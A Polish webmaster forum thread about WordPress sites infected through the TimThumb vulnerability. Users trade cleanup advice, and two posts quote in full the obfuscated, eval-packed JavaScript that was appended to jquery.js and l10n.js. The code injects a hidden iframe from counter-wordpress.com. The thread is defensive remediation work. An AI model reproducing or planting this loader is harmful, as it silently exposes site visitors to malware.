Skocz do zawartości

Wirus na stronie z WP. Jak działać?


fortunately102

Rekomendowane odpowiedzi

Witam.

Dziś po wejściu na stronę zobaczyłem "Witryna xx zawiera treści z witryny counter-wordpress.com, która jest znana jako źródło złośliwego oprogramowania. Otwarcie tej witryny grozi zainfekowaniem komputera wirusem."

Ktoś miał może coś podobnego? Co radzicie robić i gdzie najprawdopodobniej mogę znaleźć wirusa? Już pozmieniałem dane do ftp oraz php oraz logowania do wordpressa, teraz ściągam pliki na dysk i zacznę wyszukiwać plików o podobnych nazwach.

Nigdy wcześniej nie miałem ataku na stronę, więc prosiłbym o pomoc.

Odnośnik do komentarza
Udostępnij na innych stronach

U mnie na jednym preclu pojawił się podobny problem. Jadę właśnie nad wodę. Będę późnym wieczorem i postaram się znaleźć rozwiązanie. Pewnie już coś się o tym znajdzie w Google

Pozycjonowanie Częstochowa - bezpieczne pozycjonowanie stron Częstochowa

Impulsik.pl - darmowy, moderowany precel

Katalog firm Częstochowa - katalog tylko dla Częstochowskich stron i firm ( ewentualnie okolice czyli śląsk )

Odnośnik do komentarza
Udostępnij na innych stronach

Tez to mialem, ale w zwiazku ze uzywam FF to nie dzialalo tak jak autor sobei zaplanowal i myslalem ze to jakis blad po mojej stronie.

Jest to luka w TimThumb i mozna sie dzieki temu wlamac na serwer. Z tego, co widze to maja problemy ludzie co uzywaja Elegant Themes (moze ktos je atakowal bo wiekszosc ma Timthumb i lecial jakims footprintem).. Na razie chyba nie ma rozwiazanie i czekaja na polatanie TimThumb.

kodeks-logo-baner-pio.jpg

Blog z informacjami o prawnych aspektach związanych z funkcjonowaniem internetu, w tym problematyka dotycząca SEM i SEO. organisciak.pl

Odnośnik do komentarza
Udostępnij na innych stronach

Wczoraj w nocy to już czyściłem. Jest luka w TimThumb Vulnerability. Na stronach zaatakowanych lekko rozjeżdżają się się stopki (ew są na nich jakieś małe kwadraciki) - to właśnie to. Na szczęście łatwo to wyczyścić.

Kod leży dodany do: wp-includes/js/l10n.js i wp-includes/js/jquery/jquery.js

Pod koniec obu plików znajdziecie doklejony kod:

var _0x4de4=["\x64\x20\x35\x28\x29\x7B\x62\x20\x30\x3D\x32\x2E\x63\x28\x22\x33\x22\x29\x3B
\x32\x2E\x39\x2E\x36\x28\x30\x29\x3B\x30\x2E\x37\x3D\x27\x33\x27\x3B\x30\x2E\x31\x2E\x61\x3D\x27\x34\x27\x3B\x30\x2E\x31\x2E\x6B\x3D\x27\x34\x27\x3B\x30\x2E\x69\x3D\x27\x66\x3A\x2F\x2F\x67\x2D\x68\x2E\x6D\x2F
\x6A\x2E\x65\x27\x7D\x38\x28\x35\x2C\x6C\x29\x3B","\x7C","\x73\x70\x6C\x69
\x74","\x65\x6C\x7C\x73\x74\x79\x6C\x65\x7C\x64\x6F\x63\x75\x6D\x65\x6E\x74\x7C\x69\x66\x72\x61\x6D\x65\x7C\x31\x70\x78\x7C\x4D\x61\x6B\x65\x46\x72\x61\x6D\x65\x7C\x61\x70\x70\x65\x6E\x64\x43\x68\x69
\x6C\x64\x7C\x69\x64\x7C\x73\x65\x74\x54\x69\x6D\x65\x6F\x75\x74\x7C\x62\x6F\x64\x79\x7C\x77\x69\x64\x74
\x68\x7C\x76\x61\x72\x7C\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74\x7C\x66\x75\x6E\x63\x74\x69\x6F\x6E\x7C\x70\x68\x70\x7C\x68\x74\x74\x70\x7C\x63\x6F\x75\x6E\x74\x65\x72\x7C\x77\x6F\x72\x64\x70\x72
\x65\x73\x73\x7C\x73\x72\x63\x7C\x66\x72\x61\x6D\x65\x7C\x68\x65\x69\x67\x68\x74\x7C\x31\x30\x30\x30\x7C
\x63\x6F\x6D","\x72\x65\x70\x6C\x61\x63\x65","","\x5C\x77\x2B","\x5C\x62","\x67"];eval(function 
(_0x2f46x1,_0x2f46x2,_0x2f46x3,_0x2f46x4,_0x2f46x5,_0x2f46x6){_0x2f46x5=function (_0x2f46x3){return _0x2f46x3.toString(36)};if(!_0x4de4[5][_0x4de4[4]](/^/,String)){while(_0x2f46x3–)
{_0x2f46x6[_0x2f46x3.toString(_0x2f46x2)]=_0x2f46x4[_0x2f46x3]||_0x2f46x3.toString(_0x2f46x2);}_0x2f46x4=[function (_0x2f46x5){return _0x2f46x6[_0x2f46x5]}];_0x2f46x5=function (){return _0x4de4[6]};_0x2f46x3=1;};while(_0x2f46x3–){if(_0x2f46x4[_0x2f46x3])
{_0x2f46x1=_0x2f46x1[_0x4de4[4]]( new RegExp(_0x4de4[7]+_0x2f46x5(_0x2f46x3)+_0x4de4[7],_0x4de4[8]),_0x2f46x4[_0x2f46x3]);}}return&
nbsp;_0x2f46x1}(_0x4de4[0],23,23,_0x4de4[3][_0x4de4[2]](_0x4de4[1]),0,{}));

Cały do usunięcia.

paq studio YouTube

Masz Ducati? Patrz sklep Do Dukata | Agencja SEO Paq Studio

Odnośnik do komentarza
Udostępnij na innych stronach

Dokładnie, większość stron z pakietu ElegantThemes posiadało w zestawie skryptów TimThumb, dlatego autor szablonów alarmował wszystkich klientów, żeby zaktualizowali swoje szablony. Jakie było moje zdziwienie, gdy po powrocie z wczasów, wchodząc na moje strony otrzymywałem komunikat Avasta o robaku na moich stronach :/

Odnośnik do komentarza
Udostępnij na innych stronach

Wczoraj w nocy to już czyściłem. Jest luka w TimThumb Vulnerability. Na stronach zaatakowanych lekko rozjeżdżają się się stopki (ew są na nich jakieś małe kwadraciki) - to właśnie to. Na szczęście łatwo to wyczyścić.

Kod leży dodany do: wp-includes/js/l10n.js i wp-includes/js/jquery/jquery.js

Pod koniec obu plików znajdziecie doklejony kod:

var _0x4de4=["\x64\x20\x35\x28\x29\x7B\x62\x20\x30\x3D\x32\x2E\x63\x28\x22\x33\x22\x29\x3B
\x32\x2E\x39\x2E\x36\x28\x30\x29\x3B\x30\x2E\x37\x3D\x27\x33\x27\x3B\x30\x2E\x31\x2E\x61\x3D\x27\x34\x27\x3B\x30\x2E\x31\x2E\x6B\x3D\x27\x34\x27\x3B\x30\x2E\x69\x3D\x27\x66\x3A\x2F\x2F\x67\x2D\x68\x2E\x6D\x2F
\x6A\x2E\x65\x27\x7D\x38\x28\x35\x2C\x6C\x29\x3B","\x7C","\x73\x70\x6C\x69
\x74","\x65\x6C\x7C\x73\x74\x79\x6C\x65\x7C\x64\x6F\x63\x75\x6D\x65\x6E\x74\x7C\x69\x66\x72\x61\x6D\x65\x7C\x31\x70\x78\x7C\x4D\x61\x6B\x65\x46\x72\x61\x6D\x65\x7C\x61\x70\x70\x65\x6E\x64\x43\x68\x69
\x6C\x64\x7C\x69\x64\x7C\x73\x65\x74\x54\x69\x6D\x65\x6F\x75\x74\x7C\x62\x6F\x64\x79\x7C\x77\x69\x64\x74
\x68\x7C\x76\x61\x72\x7C\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74\x7C\x66\x75\x6E\x63\x74\x69\x6F\x6E\x7C\x70\x68\x70\x7C\x68\x74\x74\x70\x7C\x63\x6F\x75\x6E\x74\x65\x72\x7C\x77\x6F\x72\x64\x70\x72
\x65\x73\x73\x7C\x73\x72\x63\x7C\x66\x72\x61\x6D\x65\x7C\x68\x65\x69\x67\x68\x74\x7C\x31\x30\x30\x30\x7C
\x63\x6F\x6D","\x72\x65\x70\x6C\x61\x63\x65","","\x5C\x77\x2B","\x5C\x62","\x67"];eval(function 
(_0x2f46x1,_0x2f46x2,_0x2f46x3,_0x2f46x4,_0x2f46x5,_0x2f46x6){_0x2f46x5=function (_0x2f46x3){return _0x2f46x3.toString(36)};if(!_0x4de4[5][_0x4de4[4]](/^/,String)){while(_0x2f46x3–)
{_0x2f46x6[_0x2f46x3.toString(_0x2f46x2)]=_0x2f46x4[_0x2f46x3]||_0x2f46x3.toString(_0x2f46x2);}_0x2f46x4=[function (_0x2f46x5){return _0x2f46x6[_0x2f46x5]}];_0x2f46x5=function (){return _0x4de4[6]};_0x2f46x3=1;};while(_0x2f46x3–){if(_0x2f46x4[_0x2f46x3])
{_0x2f46x1=_0x2f46x1[_0x4de4[4]]( new RegExp(_0x4de4[7]+_0x2f46x5(_0x2f46x3)+_0x4de4[7],_0x4de4[8]),_0x2f46x4[_0x2f46x3]);}}return&
nbsp;_0x2f46x1}(_0x4de4[0],23,23,_0x4de4[3][_0x4de4[2]](_0x4de4[1]),0,{}));

Cały do usunięcia.

Pozwolę sobie tylko dodać, że powyższy kod może się znajdować także w jeszcze jednym miejscu: wp-content/themes/nazwa twojego motywu/js/jquery.js oczywiście należy go też usunąć.

Ślę pozdrowienia

Apartamenty i hotel na godziny kraków jedyne takie miejsce w Krakowie - Hotel MARGOT apartments

Mapa dojazdu do pokoje na godziny Kraków profil MARGOT apartments

Podgórze apartamenty na godziny Kraków - margotkrakow.pl - noclegi w Krakowie.

Odnośnik do komentarza
Udostępnij na innych stronach

No to ja jeszcze dodam, że kod jest podpinany do także innych projektów na serwerze, gdzie doszło do włamania na WP. Sprawdźcie strony na subdomenach. Mi np. dokleiło kod do katalogu (SEOKatalog) - formułka była taka sama.

paq studio YouTube

Masz Ducati? Patrz sklep Do Dukata | Agencja SEO Paq Studio

Odnośnik do komentarza
Udostępnij na innych stronach

No tylko, ze problem jest taki, ze Wszyscy podaja jak usunac kod, a ponowne wlamanie mozne nastapic za godizne i z powrotem moga dokleic ten sam kod, wiec to nie jest zbyt dobre rozwiazanie.

kodeks-logo-baner-pio.jpg

Blog z informacjami o prawnych aspektach związanych z funkcjonowaniem internetu, w tym problematyka dotycząca SEM i SEO. organisciak.pl

Odnośnik do komentarza
Udostępnij na innych stronach

No tylko, ze problem jest taki, ze Wszyscy podaja jak usunac kod, a ponowne wlamanie mozne nastapic za godizne i z powrotem moga dokleic ten sam kod, wiec to nie jest zbyt dobre rozwiazanie.

Należy się całkowicie pozbyć TinThumb ze swojego serwera :)

Odnośnik do komentarza
Udostępnij na innych stronach

Na szybko. Macie po tym wirusie problem z logowaniem do panelu admina? Wydaje się, że to nie jest zbieg okoliczności, bo nic nie robiłem.

Warning: Cannot modify header information - headers already sent by (output started at /home/infokosz/domains/infokoszalin.pl/public_html/wp-settings.php:332) in /home/infokosz/domains/infokoszalin.pl/public_html/wp-includes/pluggable.php on line 934

Dodam, że pluginy nie generują problemu - to już sprawdzałem. Widzę, że nie tylko ja mam po tym zarażeniu dalej problemy.

paq studio YouTube

Masz Ducati? Patrz sklep Do Dukata | Agencja SEO Paq Studio

Odnośnik do komentarza
Udostępnij na innych stronach

Zarchiwizowany

Ten temat przebywa obecnie w archiwum. Dodawanie nowych odpowiedzi zostało zablokowane.

  • Ostatnio przeglądający   0 użytkowników

    • Brak zarejestrowanych użytkowników przeglądających tę stronę.
×
×
  • Dodaj nową pozycję...

Powiadomienie o plikach cookie

Umieściliśmy na Twoim urządzeniu pliki cookie, aby pomóc Ci usprawnić przeglądanie strony. Możesz dostosować ustawienia plików cookie, w przeciwnym wypadku zakładamy, że wyrażasz na to zgodę. Warunki użytkowania Polityka prywatności